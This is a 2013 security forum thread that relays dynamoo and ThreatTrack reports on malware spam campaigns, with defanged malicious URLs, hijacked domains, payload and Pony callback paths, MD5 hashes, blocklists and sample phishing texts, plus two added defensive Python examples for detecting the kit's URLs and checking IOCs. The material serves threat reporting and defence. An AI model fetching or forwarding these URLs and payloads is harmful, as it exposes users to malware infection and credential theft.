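Added example, not part of the quoted posts: the ThreatTrack and dynamoo URL lists from 23 to 25 July all follow the same shape regardless of which hijacked domain is in play: a landing page at /topic/<words>.php, a second request to the same page with five fixed-shape parameters (two blobs over the characters 0-9 and a-j of 10 and 20 characters, a constant "=2d", two one-letter values), a payload at /adobe/update_flash_player.exe, and Pony callbacks to /ponyb/gate.php. The detector below matches that structure instead of the domains, so it still fires when the next run moves to a fresh domain. The regexes are only as specific as the URLs quoted above; the stage names, the log format ("epoch client method url") and the log lines are constructed for the example.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Landing-page path: /topic/<two or more words>.php, as in
# /topic/accidentally-results-stay.php and /topic/regard_alternate_sheet.php
BH_LANDING = re.compile(r"^/topic/[a-z]+(?:[-_][a-z]+)+\.php$")
# Second request to the same page: five parameters with fixed shapes, e.g.
# ?wf=57552j302f&qe=302g572f5352572i572f&T=2d&XD=A&Zn=r
BH_QUERY = re.compile(
    r"^[A-Za-z]{2}=[0-9a-j]{10}&[A-Za-z]{2}=[0-9a-j]{20}&[A-Za-z]=2d"
    r"&[A-Za-z]{2}=[A-Za-z]&[A-Za-z]{2}=[A-Za-z]$"
)
FAKE_FLASH = re.compile(r"^/adobe/update_flash_player\.exe$", re.I)
PONY_GATE = re.compile(r"^/ponyb/gate\.php$", re.I)


def classify(url):
    """Name the stage a URL belongs to, or None if it matches nothing."""
    u = urlsplit(url if "://" in url else "http://" + url)
    if PONY_GATE.match(u.path):
        return "pony-gate-callback"
    if FAKE_FLASH.match(u.path):
        return "blackhole-payload-download"
    if BH_LANDING.match(u.path):
        return "blackhole-exploit-fetch" if BH_QUERY.match(u.query) else "blackhole-landing"
    return None


# Constructed proxy log, "epoch client method url" (not from the posts).
SAMPLE_LOG = """\
1374772800 10.1.2.3 GET http://evocarr.net/topic/accidentally-results-stay.php?KVVWmNcvwPD=WJOsotrS&BTvKFG=felbOVVkanHPuB
1374772801 10.1.2.3 GET http://evocarr.net/topic/accidentally-results-stay.php?wf=57552j302f&qe=302g572f5352572i572f&T=2d&XD=A&Zn=r
1374772803 10.1.2.3 GET http://evocarr.net/adobe/update_flash_player.exe
1374772805 10.1.2.7 GET http://evocarr.net/topic/accidentally-results-stay.php?KVVWmNcvwPD=WJOsotrS&BTvKFG=felbOVVkanHPuB
1374772806 10.1.2.9 POST http://prospexleads.com:8080/ponyb/gate.php
1374772807 10.1.2.8 GET http://example.org/topic/index.php
"""


def scan_log(text):
    """Return (client, stage) for every log line that matches a stage."""
    hits = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 4:
            continue
        stage = classify(parts[3])
        if stage:
            hits.append((parts[1], stage))
    return hits


def infected_clients(hits):
    """Clients that went past the landing page to the payload download.

    A landing-page hit alone is a visit (the exploit may have failed);
    the payload fetch after it is what marks the host for reimaging.
    """
    stages = defaultdict(set)
    for client, stage in hits:
        stages[client].add(stage)
    return sorted(c for c, s in stages.items()
                  if "blackhole-payload-download" in s
                  and s & {"blackhole-landing", "blackhole-exploit-fetch"})


if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for client, stage in found:
        print(client, stage)
    print("infected:", infected_clients(found))
```

The trade-off is the usual one for structural signatures: it outlives any single domain list but needs re-tuning the day the kit changes its path or parameter scheme, so keep the exact-IOC checks alongside it rather than replacing them.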
AplusWebMaster
2013-07-26, 20:28
FYI...
Fake eBay SPAM / artimagefrance .com
- http://blog.dynamoo.com/2013/07/welcome-to-ebay-community-spam.html
26 July 2013 - "This fake eBay email leads to malware on artimagefrance .com:
Date: Fri, 26 Jul 2013 21:40:48 +0900 [08:40:48 EDT]
From: eBay [eBay@ reply1.ebay .com]
Subject: [redacted] welcome to the eBay community! ...
Screenshot: https://lh3.ggpht.com/-A3yIPZIZmr0/UfJ29Ko7f1I/AAAAAAAABnY/oICYwUwvGPU/s640/fake-ebay.png
The link in the email goes to a legitimate -hacked- site and then runs one or more scripts from the following list of three:
[donotclick]75.126.43.229 /deputy/clodhoppers.js
[donotclick]andywinnie .com/guessable/meteor.js
[donotclick]hansesquash .de/wimples/dunning.js
The victim is then sent to a malware landing page at [donotclick]artimagefrance .com/topic/accidentally-results-stay.php hosted on 184.95.37.110 (Secured Servers LLC, US / Jolly Works Hosting, Philippines). I would recommend blocking 184.95.37.96/28 in this case..."
... eBay Spam
- http://threattrack.tumblr.com/post/56515852365/welcome-to-ebay-spam
July 26, 2013 - "Subjects Seen:
<Name> welcome to the eBay community!
Typical e-mail details:
Welcome to eBay
The simpler way to save and shop
Start shopping ...
Malicious URLs
gwiz .de/balloonists/index.html
dialogueseriesonline .com/snag/index.html
dbrsnet .info/restore/index.html
b-able .gr/overshot/index.html
artimagefrance .com/adobe/update_flash_player.exe
artimagefrance .com/topic/accidentally-results-stay.php
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/f2bf2b94985161a820099500ce8ba421/tumblr_inline_mqjq2fl7mw1qz4rgp.png
___
Fake Intellicast weather SPAM / artimagefrance .com
- http://blog.dynamoo.com/2013/07/intellicastcom-spam-artimagefrancecom.html
26 July 2013 - "This fake weather spam leads to malware on artimagefrance .com:
Date: Fri, 26 Jul 2013 02:46:26 -0800 [06:46:26 EDT]
From: "Intellicast.com" [weather @intellicast .com]
Subject: Intellicast.com [weather @intellicast .com]
Intellicast.com Weather E-mail - Thursday, Jul 25, 2013 3:38 AM
For the complete 10-Day forecast and current conditions, visit ...
The payload and infection technique is exactly the same as the one used here*."
* http://blog.dynamoo.com/2013/07/welcome-to-ebay-community-spam.html
Intellicast Weather Report Spam
- http://threattrack.tumblr.com/post/56517479825/intellicast-com-weather-report-spam
July 26, 2013 - "Subjects Seen:
Intellicast .com <weather@intellicast .com>
Typical e-mail details:
Intellicast .com Weather E-mail - Thursday, Jul 25, 2013 3:38 AM
For the complete 10-Day forecast and current conditions, visit Intellicast .com:
intellicast .com/Local/Weather.aspx?location=USNH0164
Malicious URLs
tohoradio .dx .am/depression/index.html
tohoradio .dx .am/packers/index.html
artimagefrance .com/adobe/update_flash_player.exe
artimagefrance .com/topic/accidentally-results-stay.php
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/d54ab959ed6b7b2e8584f7f18f031633/tumblr_inline_mqjrk1Oilk1qz4rgp.png
___
Fake BoA transaction SPAM / payment receipt 26-07-2013 .zip
- http://blog.dynamoo.com/2013/07/bank-of-america-your-transaction-is.html
26 July 2013 - "This fake Bank of America spam has a malicious attachment:
Date: Fri, 26 Jul 2013 15:50:32 +0200 [09:50:32 EDT]
From: impairyd04 @gmail .com
Subject: Your transaction is completed
Transaction is completed. $09681416 has been successfully transferred.
If the transaction was made by mistake please contact our customer service.
Payment receipt is attached...
There is an attachment payment receipt 26-07-2013.zip which in turn contains the executable file payment receipt 26-07-2013.exe. This appears to be a Zbot variant with a pretty low detection rate of 9/46 at VirusTotal*. The Malwr report** is the most detailed for this sample, and Anubis also has some useful information. Of note is that there is network traffic to the following IPs that seem to be pretty common for this Zbot / Zeus variant..."
(Long list of URLs at the dynamoo URL above.)
* https://www.virustotal.com/en-gb/file/a01bbc1d6ec47557cb1611a7f999ac949b0a66e42d4e3348640cb179d20d5802/analysis/1374847946/
** https://malwr.com/analysis/YmQwZGUwYTVjMDczNDVjNTlkOThkY2E0MDYyYjJkNmQ/
___
CNN Walking Dead News Alert Spam
- http://threattrack.tumblr.com/post/56519745779/cnn-walking-dead-news-alert-spam
July 26, 2013 - "Subjects Seen:
BreakingNews CNN: New season new ‘Walking Dead’
Typical e-mail details:
What you’ll see on the new ‘Walking Dead’
Before heading to Comic-Con in San Diego last weekend, the cast members of “The Walking Dead" were each given a folder with talking points about the upcoming fourth season.
The folders contained information on what the actors could and couldn’t say about the new episodes, which premieres October 13 on AMC. Although none of the actors could reveal the contents of the folders, it was clear that there are lots of secrets to be kept about where “The Walking Dead" will be headed when it returns.
Full Story »»
Malicious URLs
grupocelebrate .com .br/lozenge/index.html
stem.harrisonschools .org/optimization/index.html
grupocelebrate .com .br/saintlier/index.html
artimagefrance .com/adobe/update_flash_player.exe
artimagefrance .com/topic/accidentally-results-stay.php
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/958a8c73670efa712dbebfca9d1f4ea1/tumblr_inline_mqjthnGGfk1qz4rgp.png
:mad: :fear:
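The reports above keep recommending the same kind of thing: block a host or a small range (184.95.37.96/28 around the 184.95.37.110 landing page) and compare new defanged URLs against it. The block below is an added example, not code from dynamoo, ThreatTrack or the poster: it normalises IOCs written in the thread's defanged style ("[donotclick]", "example .com", "(DOT)", "93 /file.exe", "35 :8080") and checks each one against a blocklist of hostnames and CIDR ranges. Only the 184.95.37.x and 66.175.217.235 values come from the page; the deltaexample-* hostnames and the sample URLs are constructed placeholders.

```python
"""Normalise defanged IOCs and check them against a recommended blocklist.

Added example (not the page's or any vendor's code). Sample IOC lines and the
deltaexample-* domains are constructed; 184.95.37.96/28, 184.95.37.110 and
66.175.217.235 are the values the reports themselves recommend blocking.
"""
import ipaddress
import re

# Defanging conventions seen in the thread: a "[donotclick]" prefix, a space
# before the TLD ("example .com", "frccc. com"), "(DOT)" for a dot, and a space
# before ":port" or "/path" after a bare IP ("198.61.134.93 /MM75.exe").
_PREFIX = re.compile(r"^\[donotclick\]\s*", re.IGNORECASE)


def refang(entry: str) -> str:
    """Turn a defanged IOC into its plain form; a trailing ' ...' is dropped."""
    s = _PREFIX.sub("", entry.strip()).rstrip(" .")
    s = s.replace("(DOT)", ".")
    s = s.replace(" .", ".").replace(". ", ".")
    s = re.sub(r"\s+(?=[:/])", "", s)      # "93 /x.exe" -> "93/x.exe", "35 :8080" -> "35:8080"
    return s


def host_of(url: str) -> str:
    """Host part of a (refanged) URL: scheme, port and path removed, lower-cased."""
    s = re.sub(r"^[a-z][a-z0-9+.-]*://", "", url, flags=re.IGNORECASE)
    return s.split("/", 1)[0].split(":", 1)[0].lower()


def build_blocklist(entries):
    """Split a 'Recommended blocklist' into IP networks and bare hostnames."""
    networks, hostnames = [], set()
    for raw in entries:
        item = refang(raw)
        try:
            networks.append(ipaddress.ip_network(item, strict=False))  # single IP or CIDR
        except ValueError:
            hostnames.add(host_of(item))
    return networks, hostnames


def is_blocked(ioc: str, networks, hostnames) -> bool:
    """True if the IOC's host is inside a listed range or is (a subdomain of) a listed name."""
    host = host_of(refang(ioc))
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        # Blocklists name registered domains; a listed name also covers its subdomains.
        return any(host == h or host.endswith("." + h) for h in hostnames)
    return any(ip in net for net in networks)


# Constructed blocklist in the page's own style (hostnames are placeholders).
SAMPLE_BLOCKLIST = [
    "184.95.37.96/28",
    "66.175.217.235",
    "deltaexample-one .net",
    "deltaexample-two .com ...",
]

# Constructed observed URLs, defanged the way the reports defang them.
SAMPLE_IOCS = [
    "[donotclick]184.95.37.110 /topic/landing.php",
    "[donotclick]184.95.37.112 /topic/landing.php",
    "ftp(DOT)deltaexample-one .net/kimonos/index.html",
    "[donotclick]webmail.deltaexample-three .info:8080/ponyb/gate.php",
]


def triage(iocs=SAMPLE_IOCS, blocklist=SAMPLE_BLOCKLIST):
    """Map each refanged IOC host to whether the blocklist already covers it."""
    networks, hostnames = build_blocklist(blocklist)
    return {host_of(refang(i)): is_blocked(i, networks, hostnames) for i in iocs}


if __name__ == "__main__":
    for host, covered in triage().items():
        print(f"{'blocked  ' if covered else 'uncovered'}  {host}")
```

Two details matter in practice: 184.95.37.110 is inside 184.95.37.96/28 but 184.95.37.112 is just outside it, so a /28 recommendation has to be checked arithmetically rather than by eye, and a hostname entry should match subdomains (ftp., webmail.) or the gate/landing hosts in these reports slip past a list of bare domains.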
AplusWebMaster
2013-07-29, 19:36
FYI...
Fake Facebook SPAM - happykido .com
- http://blog.dynamoo.com/2013/07/facebook-spam-happykidocom.html
29 July 2013 - "This fake Facebook spam leads to malware on happykido .com:
Date: Mon, 29 Jul 2013 09:33:38 -0600 [11:33:38 EDT]
From: Facebook [update+zj4o40c2_aay @facebookmail .com]
Subject: Betsy Wells wants to be friends with you on Facebook.
Interesting Pages on Facebook
Mark as favorite web pages that interest you to receive their updates in your News Feed.
Betsy Wells
Baldric Aguino
Astrid Aggas
Deloris Bransfield
Perdita Brantz
Danelle Erstad
Daphne Escamilla
Giovanna Hadesty
Georgeann Habel
Hugh Campisi
Jake Callas ...
Apparently all these people look alike:
- https://lh3.ggpht.com/-CkL-FcPTPRE/UfaM-AwUVCI/AAAAAAAABoY/erhuMZqK_wg/s400/fake-facebook.png
This is a "ThreeScripts" attack: clicking the link goes to a legitimate hacked site which then tries to run one of the following:
[donotclick]system-hostings .info/aphrodisiac/nought.js
[donotclick]gc.sceonline .org/worsens/patronizingly.js
[donotclick]www.kgsindia .org/retell/manson.js
from there, the victim is sent to a malware landing page on a -hijacked- GoDaddy domain at [donotclick]happykido .com/topic/able_disturb_planning.php hosted on 50.2.138.161 (ServerHub Phoenix, US). There are several other hacked GoDaddy domains on the same server, all of which should be considered to be malicious.
Recommended blocklist:
50.2.138.161 ..."
- https://www.virustotal.com/en-gb/ip-address/50.2.138.161/information/
___
Fake "Key Secured Message" SPAM / SecureMessage .zip
- http://blog.dynamoo.com/2013/07/key-secured-message-spam.html
29 July 2013 - "This spam has a malicious attachment:
Date: Mon, 29 Jul 2013 06:08:44 -0800 [10:08:44 EDT]
From: "Marcia_Manning @key .com" [Marcia_Manning @key .com]
Subject: Key Secured Message
You have received a Secured Message from:
Marcia_Manning @key .com
The attached file contains the encrypted message that you have received. To decrypt the message use the following password - nC4WR706
To read the encrypted message, complete the following steps:
- Double-click the encrypted message file attachment to download the file to your computer.
- Select whether to open the file or save it to your hard drive. Opening the file displays the attachment in a new browser window.
- The message is password-protected, enter your password to open it.
This e-mail and any attachments are confidential and intended solely for the addressee and may also be privileged or exempt from disclosure under applicable law. If you are not the addressee, or have received this e-mail in error, please notify the sender immediately, delete it from your system and do not copy, disclose or otherwise act upon any part of this e-mail or its attachments...
The attachment SecureMessage.zip contains an executable SecureMessage.exe which has to be unencrypted with the password supplied in the email (which is kind of stupid for a supposedly secure mail), and this has a VirusTotal detection rate of just 6/46*. The Malwr analysis** shows that this is a pony/gate downloader, first downloading from [donotclick]webmail.alsultantravel .com/ponyb/gate.php on 198.57.130.34 (Unified Layer / Bluehost, US) and then downloading one of the following:
[donotclick]a1bridaloutlet .co .uk/aiswY6.exe (5/45)
[donotclick]www.giftedintuitive .com/kQYjoPqY.exe (11/46)
[donotclick]198.61.134.93 /MM75.exe (5/45)
[donotclick]paulalfrey .com/guBwFA.exe (5/46)
Recommended blocklist:
198.57.130.34
198.61.134.93 ..."
* https://www.virustotal.com/en-gb/file/cb41b3a461f1de0a40e490eb203547faeedfd622507d6fea2623163bab0e62c9/analysis/1375109054/
- https://www.virustotal.com/en-gb/ip-address/198.57.130.34/information/
- https://www.virustotal.com/en-gb/ip-address/198.61.134.93/information/
** https://malwr.com/analysis/YWJiMDkyNjdhY2Y3NGFkY2I3MmNlMjBlMjAxZWVhMmU/
Key.com Secured Message Spam
- http://threattrack.tumblr.com/post/56785961967/key-com-secured-message-spam
July 29, 2013 - "Subjects Seen:
Key Secured Message
Typical e-mail details:
You have received a Secured Message from:
<removed>@key .com
The attached file contains the encrypted message that you have received.
To decrypt the message use the following password - <removed>
To read the encrypted message, complete the following steps:
- Double-click the encrypted message file attachment to download the file to your computer.
- Select whether to open the file or save it to your hard drive. Opening the file displays the attachment in a new browser window.
- The message is password-protected, enter your password to open it.
This e-mail and any attachments are confidential and intended solely for the addressee and may also be privileged or exempt from disclosure under applicable law...
Malicious URLs
198.57.130.35 :8080/ponyb/gate.php
webmail.alsultantravel .info:8080/ponyb/gate.php
alsultantravel .com:8080/ponyb/gate.php
webmail.alsultantravel .com:8080/ponyb/gate.php
a1bridaloutlet .co.uk/aiswY6.exe
giftedintuitive .com/kQYjoPqY.exe
198.61.134.93 /MM75.exe
paulalfrey .com/guBwFA.exe
Malicious File Name and MD5:
SecureMessage.zip (01CC5CE52FC839EBCE6497FB88B1781F)
SecureMessage.exe (81129764C62417D5B06C73E6FAD838A5)
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/6d2504c920f55deff3dceeba953064e7/tumblr_inline_mqpdwp4v541qz4rgp.png
___
HSBC E-Advice Spam
- http://threattrack.tumblr.com/post/56785714666/hsbc-e-advice-spam
July 29, 2013 - "Subjects Seen:
HSBC E-Advice
Typical e-mail details:
Please find attached your Advice containing information on your transactions of last working day with the bank.
Please do not reply to this e-mail address. If you have any queries, please contact our Customer Services.
Yours faithfully
HSBC Bank
Malicious URLs
198.57.130.35 :8080/ponyb/gate.php
webmail.alsultantravel .info:8080/ponyb/gate.php
alsultantravel .com:8080/ponyb/gate.php
webmail.alsultantravel .com:8080/ponyb/gate.php
wx04.strato-wlh .de/EggT.exe
labycar .com/Zi6L.exe
208.112.50.5 /c38QVmd.exe
s148231503.onlinehome .us/y3R.exe
Malicious File Name and MD5:
HSBC_advice.zip (6C5A65A05E72ADFC64318E7730199192)
HSBC_advice.exe (E1DBB4BE2A7AE2180100A02C5E3E2D95)
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/fc7a33880c542d65b53e856f5b526fcc/tumblr_inline_mqpdol30Ux1qz4rgp.png
___
FedEx Shipment Notification Spam
- http://threattrack.tumblr.com/post/56791204438/fedex-shipment-notification-spam
July 29, 2013 - "Subjects Seen:
FedEx Shipment Notification
Typical e-mail details:
This tracking update has been requested and attached to this email
Reference information includes: Invoice number, Reference, Special handling/Services, Residential Delivery. Reference information is attached to this email.
Tracking number: <removed>
To track the latest status of your shipment, click on the tracking number above, or visit us at fedex .com...
This tracking update has been sent to you by FedEx on the behalf of the Requestor noted above. FedEx does not validate the authenticity of the requestor and does not validate, guarantee or warrant the authenticity of the request, the requestor’s message, or the accuracy of this tracking update...
Thank you for your business.
Malicious File Name and MD5:
FedEx Notification.zip (7CFE2BE8E249E9A05664CB2E4BABD6AC)
FedEx Notification_.PDF.exe (E4EC9F6232A272EA76B65F94A86FF184)
FedEx Reference information.zip (F28D58D5CA4910495DBB786E8AC0E5D3)
FedEx Reference information.pdf.exe (CE23868B4F645A39CBB6AE98796346CB)
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/b7bb51169f2ce592c651e0bfc94a77d3/tumblr_inline_mqphqrDK0H1qz4rgp.png
___
DocuSign Confidential Company Agreement Spam
- http://threattrack.tumblr.com/post/56792357413/docusign-confidential-company-agreement-spam
July 29, 2013 - "Subjects Seen:
Completed: Please DocuSign this document : Confidential Company Agreement 2013..pdf
Typical e-mail details:
Your document has been completed
Sent on behalf of DocuSign Support.
All parties have completed the envelope ‘Please DocuSign this document: 2013 Company Contracts..pdf’.
To view, download or print the completed document click below.
View in DocuSign
Malicious URLs
thealphatechnologies .com/interlaces/index.html
digitalcaptive .net/chickpea/index.html
ftp(DOT)kirchdach .at/kimonos/index.html
webmail.alsultantravel .com:8080/ponyb/gate.php
happykiddoh .com/topic/able_disturb_planning.php
happykiddoh .com/adobe/update_flash_player.exe
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/8a42f3172fb0f56ef786bba4c3dadf91/tumblr_inline_mqpiivHReI1qz4rgp.png
More here:
- https://www.virustotal.com/en-gb/ip-address/198.57.130.34/information/
"... domains resolved to the given IP address...
... Latest URLs hosted in this IP address detected by at least one URL scanner or malicious URL dataset..."
___
Visa Recent Transactions Report Spam
- http://threattrack.tumblr.com/post/56814041368/visa-recent-transactions-report-spam
July 29, 2013 - "Subjects Seen:
VISA - Recent Transactions Report
Typical e-mail details:
Dear Visa card holder,
A recent review of your transaction history determined that your card was used in possible fraudulent transactions. For security reasons the requested transactions were refused. Please carefully review electronic report for your VISA card.
For more details please see the attached transaction report.
Augustus_Molina
Data Protection Officer
VISA EUROPE LIMITED
1 Sheldon Square
London W2 6WH
United Kingdom
Malicious URLs
asam.atspace .eu/windsocks/index.html
deltaboatworks .net/adobe/update_flash_player.exe
deltaboatworks .net/topic/able_disturb_planning.php
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/11d58d2a23d6cb4fb5290dc8c499bc02/tumblr_inline_mqpvicYWPV1qz4rgp.png
:fear::mad::fear:
AplusWebMaster
2013-07-30, 20:02
FYI...
Fake CNN Angelina Jolie SPAM / deltadazeresort .net
- http://blog.dynamoo.com/2013/07/cnn-angelina-jolie-tops-list-of-highest.html
30 July 2013 - "This fake CNN spam leads to malware on deltadazeresort .net:
Date: Tue, 30 Jul 2013 17:52:54 +0330 [10:22:54 EDT]
From: CNN [BreakingNews @mail .cnn .com]
Subject: CNN: Forbes: Angelina Jolie tops list of highest-paid actresses
Forbes: Angelina Jolie tops list of highest-paid actresses
By Sheridan Watson, EW.com
July 29, 2013 -- Updated 2014 GMT (0414 HKT)
Agelina Jolie attends a June 2013 premiere of Brad Pitt's movie, "World War Z" ...
Screenshot: https://lh3.ggpht.com/-PEc8KASFfZ4/UffZuOm5_fI/AAAAAAAABo8/ek411jNZMr0/s400/jolie.png
The link in the email goes to a legitimate -hacked- site and then to one or more of three scripts:
[donotclick]00002nd.rcomhost .com/immanent/surfeit.js
[donotclick]theplaidfox .com/bulbs/falcon.js
[donotclick]sandbox.infotraxdevdocs .com/afforestation/provosts.js
From there the victim is sent to a landing page at [donotclick]deltadazeresort .net/topic/able_disturb_planning.php. At the time of writing this hijacked GoDaddy domain does not resolve, but it was recently hosted on the following IPs alongside these other hacked GoDaddy domains:
66.175.217.235 (Linode, US)
173.246.104.136 (Gandi, US) ..."
CNN Angelina Jolie Spam
- http://threattrack.tumblr.com/post/56879888289/cnn-angelina-jolie-spam
July 30, 2013 - "Subjects Seen:
CNN: Forbes: Angelina Jolie tops list of highest-paid actresses
Typical e-mail details:
(EW.com) — She might not get paid as much as “Iron Man," but there’s no doubt that celestial beauty Angelina Jolie is smiling all the way to the bank.
This year, Jolie topped Forbes’ annual list of the highest-paid actresses in Hollywood with an incredibly robust $33 million.
Malicious URLs
gbheatings .com/thou/index.html
casa-dor .com/bookstore/index.html
deltadazeresort .net/topic/able_disturb_planning.php
deltadazeresort .net/adobe/update_flash_player.exe
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/dadfa9668184e4b6701b2f6b487022a8/tumblr_inline_mqr8k5iSDk1qz4rgp.png
___
Pharma sites to block 30/7/13
- http://blog.dynamoo.com/2013/07/pharma-sites-to-block-30713.html
30 July 2013 - "These IPs host (fake) pharma sites which seem to be associated with this gang* and share some of their infrastructure. As far as I can tell, none of them host malware.. but the IPs involved could be repurposed as malware servers and blocking them might be prudent...
Recommended blocklist:
88.190.218.27
91.199.149.0/24
91.200.13.0/24
91.204.162.81
91.204.162.96
94.152.188.165
94.242.239.4
109.107.203.45
192.162.19.0/24
198.23.59.79 ..."
(More listed at the dynamoo URL above.)
* http://blog.dynamoo.com/search/label/Amerika
___
Malware sites to block 30/7/13
- http://blog.dynamoo.com/2013/07/malware-sites-to-block-30713.html
30 July 2013 - "These sites and IPs are associated with this gang*, and are either currently in use or they have been in use recently. The list has individual IPs and web hosts first, followed by a plain list of recommended items to block..."
(Long list of IPs at the dynamoo URL above.)
* http://blog.dynamoo.com/search/label/Amerika
___
Fake Pinterest password SPAM / onsayoga .net
- http://blog.dynamoo.com/2013/07/your-password-on-pinterest-was.html
30 July 2013 - "This fake Pinterest spam leads to malware on onsayoga .net:
Date: Tue, 30 Jul 2013 11:17:28 -0500 [12:17:28 EDT]
From: Pinterest [caulksf8195 @customercare .pinterrest .net]
Subject: Your password on Pinterest was Successfully modified!
A Few Updates...
[redacted]
Changing your password is complete. Please use the link below within 24 hours. reset. Receive New Password to email.
Ask for a New Password
Pinterest is a tool for collecting and organizing things you love.
This email was sent to [redacted].
Screenshot: https://lh3.ggpht.com/-RA2Ds5rYUic/UfgEta3g9TI/AAAAAAAABpM/1ptRb_zTs_c/s400/pinterest.png
The link goes through a legitimate -hacked- site and then on to [donotclick]www .pinterest.com.onsayoga .net/news/pinterest-paswword-changes.php (report here*) which is hosted on the following IPs:
95.111.32.249 (Megalan EAD, Bulgaria)
122.128.109.46 (Ximbo / CPCnet, Hong Kong)
209.222.67.251 (Razor Inc, US)
These IPs are controlled by this gang** and form part of this large network*** of malicious IPs and domains. I recommend you use -that- list in conjunction with blocking onsayoga .net."
* http://urlquery.net/report.php?id=4226343
** http://blog.dynamoo.com/search/label/Amerika
*** http://blog.dynamoo.com/2013/07/malware-sites-to-block-30713.html
___
Fake eBay SPAM / deltamarineinspections .net
- http://blog.dynamoo.com/2013/07/ebay-ready-to-get-started-heres-how.html
30 July 2013 - "There is currently an eBay-themed "ready to get started? Here’s how" spam run active, effectively almost the same as this one*, except this time there is a new set of intermediate scripts and payload page. The three scripts** involved are:
[donotclick]03778d6.namesecurehost .com/meaningful/unsnapping.js
[donotclick]icontractor .org/followings/trolloped.js
[donotclick]tvassist .co .uk/plead/grueled.js
..leading to a payload page at [donotclick]deltamarineinspections .net/topic/able_disturb_planning.php on 66.175.217.235 (Linode, US). The domains in use are -hijacked- from a GoDaddy account and belong to the same poor sod that lost control of the ones here***.
Recommended blocklist:
66.175.217.235
deltaboatraces .net
deltaboatworks .net
deltadazeresort .net
deltamarineinspections .net
deltarentalcenter .net
deltariverhouse .net
deltayachtclub .net ..."
* http://blog.dynamoo.com/2013/07/welcome-to-ebay-community-spam.html
** http://blog.dynamoo.com/search/label/ThreeScripts
*** http://blog.dynamoo.com/2013/07/cnn-angelina-jolie-tops-list-of-highest.html
___
Fake Facebook SPAM again / deltaoutriggercafe .com
- http://blog.dynamoo.com/2013/07/facebook-spam-deltaoutriggercafecom.html
30 July 2013 - "These guys are busy. This fake Facebook spam leads to malware on deltaoutriggercafe .com:
Date: Tue, 30 Jul 2013 15:05:25 -0500 [16:05:25 EDT]
From: Facebook [no-reply @facebook .com]
Subject: Issac Dyer wants to be friends with you on Facebook.
facebook
Issac Dyer wants to be friends with you on Facebook.
University of Houston, Victoria
342 friends - 28 photos
Confirm Request
See All Requests
This message was sent to [redacted]...
I don't know about you, but I think Isaac looks a bit like a girl:
> https://lh3.ggpht.com/-pCmjcU0ocQs/Ufgp_qXf_XI/AAAAAAAABpc/L5SzS_CfCVA/s1600/facebook.png
Predictably, clicking on the link in the email leads to a legitimate hacked site and then the same redirector scripts found in this spam run*. However, in this case the target has now changed to [donotclick]deltaoutriggercafe .com/topic/able_disturb_planning.php which is hosted on 66.175.217.235 (Linode, US) along with a whole bunch of other similar domains that have been -hijacked- from GoDaddy.
Recommended blocklist:
66.175.217.235
deltaboatraces .net
deltaboatworks .net
deltadazeresort .net
deltamarineinspections .net
deltaoutriggercafe .com
deltarentalcenter .net
deltariverhouse .net
deltayachtclub .net ..."
* http://blog.dynamoo.com/2013/07/ebay-ready-to-get-started-heres-how.html
:fear::fear: :mad:
AplusWebMaster
2013-07-31, 18:54
FYI...
Threat Outbreak Alerts
- http://tools.cisco.com/security/center/threatOutbreak.x?i=77
Fake Bank Deposit Notification Email Messages - 2013 Jul 31
Fake Online Banking Software Security Update Email Messages [Trusteer] - 2013 Jul 31
Fake Customer Complaint Attachment Email Messages - 2013 Jul 31
Fake Product Services Specification Request Email Messages - 2013 Jul 31
(More detail and links at the cisco URL above.)
___
IRS Tax Payment Rejected Spam
- http://threattrack.tumblr.com/post/56980373227/irs-tax-payment-rejected-spam
July 31, 2013 - "Subjects Seen:
Your FED TAX payment ( ID : <removed> ) was Rejected
Typical e-mail details:
... Your federal Tax payment (ID: <removed>), recently sent from your checking account was returned by the your financial institution.
For more information, please visit the following link -eftps.com/eftps/payments/history/detail/view?eft=
Transaction Number: <removed>
Payment Amount: $ 7882.00
Transaction status: Rejected
ACH Trace Number: <removed>
Transaction Type: ACH Debit Payment-DDA
Malicious URLs
diyhomeimprovementtips .com/clunkier/index.html
ossjobs .com/tangled/index.html
singular-cy .com/throughout/index.html
deltaoutriggercafe .com/adobe/update_flash_player.exe
deltaoutriggercafe .com/topic/regard_alternate_sheet.php
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/72882cd7094d1051dbf5e33bf176a4e5/tumblr_inline_mqt7s5cWsD1qz4rgp.png
:fear::mad:
AplusWebMaster
2013-08-01, 16:24
FYI...
Pump and dump SPAM - Biostem ...
- http://blog.dynamoo.com/2013/08/pump-and-dump-spam-flogs-dead-horse.html
1 August 2013 - "About a month-and-a-half ago* I had a look at the pump-and-dump spam promoting Biostem U.S. Corporation (HAIR)** when it was trading at around $0.30. Surprisingly, the pump-and-dump spam is still ongoing which will make it nearly two months of spam on one single stock..
This Company Will Make an Impressive Recovery! It is the answer
to your portfolio troubles!
Date: August 1st
Long Term Target: .85
Per share price: .035
Ticker: HAI_R
Name: Biostem Corp.
You might want to sit down before reading this... Stocks To
Look At!
So, out of curiosity I schlepped across to look at their stock price and was slightly surprised to see that it has lost around 90% of its value since the spam run started. What happened? Well, on 19th July the stock price fell off a cliff when rather predictably Biostem announced that it was shutting up shop***, and looking at news reports there seems to be little chance of recovery.
Screenshot: https://lh3.ggpht.com/-itbe0rPDyM4/UfoPa4iKsjI/AAAAAAAABpw/CC1UsgfthSQ/s1600/biostem5.png
But now with shares bouncing along at around the 3 to 4 cents mark the pump-and-dump seems to be continuing, and since the collapse it appears that around 9.6 million shares have been traded, which is about 8.4% of the total equity. At today's prices those shares are worth about $336,000. A little over a year ago, on May 28th 2012, Biostem stock peaked at $439 per share, at close of business yesterday they were just 3.5 cents.. a 99.2% drop. Somebody has certainly taken a haircut on these stocks.. "
